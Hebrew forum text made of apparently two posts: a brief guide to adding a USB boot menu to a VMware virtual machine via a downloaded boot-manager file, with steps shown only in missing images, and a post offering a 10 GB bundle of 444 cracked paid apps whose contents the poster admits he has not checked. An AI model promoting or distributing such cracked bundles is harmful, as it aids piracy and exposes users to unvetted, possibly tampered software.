מי שמבין ומתמצא במכונה הווירטואלית של VMware יודע שאין אפשרות להעלות אתחול USB דרך המכונה, למשל, אם אני רוצה להתקין ווינדוס 10 במכונה דרך ההתקן נשלף, או מעוניין לבדוק את ההתקן שהוא תקין ומצליח להריץ את האימג' בצורה חלקה וטובה, אין אפשרות לבדוק את זה במכונה וירטואלית.
ועל כך בא המדריך הבא, איך לעשות Boot Menu במכונה וירטואלית כאילו זה מחשב רגיל שאפשר לבחור את ההתקן מתוך הרשימה כמו בתמונות הבאות:
ראשית כל נוריד מכונה וירטואלית, אפשר למצוא את התוכנה ברחבי הפורום והרשת או להיכנס לכאן.
אחרי שמתקינים את התוכנה ומפעילים אותה, יש צורך להוריד קובץ נוסף בשביל המדריך שלנו.
להורדת הקובץ: pbm6-test-20210119
מקור - אתר הבית של התוכנה
כעת נפתח את המכונה, ונעשה את ההגדרות לפי התמונות הבאות:
אני מקווה שהשלבים של התמונות ברורים מאוד, אם יהיה צורך בהסרטה אפשר לבקש ממני בהודעה פרטית ואשתדל להעלות את זה במידת הצורך.
ישנם הרבה אנשים שאוספים כל מיני אפליקציות מפורסמות בתשלום מהרשת, ופורצים אותם כדי שאחרים ישתמשו משימוש פרימיום ללא עלות.
אני אשתדל פעם בכמה חודשים להביא כאן חבילה של אפליקציות פופולאריות ומעדכנות לאחרונה.
יש כל מיני חבילות מסוגים שונים, בגדלים שונים, בחרתי להביא חבילה שהיא יחסית גדולה לשאר החבילות (444 אפליקציות, 10 ג'יגה אחרי חילוץ), למרות שאיני מכיר את רוב האפליקציות שנמצאות שם, אך מי שרוצה קצת להעסיק את עצמו בסגר הנוכחי, אני בטוח שזה יהיה לו תעסוקה של כמה שעות (או ימים) לבדוק כל אפליקציה לגופה.
אין צורך לשאול אותי על שימוש באפליקציות ועל תקינותם, כמו שאמרתי איני מכיר את רובם.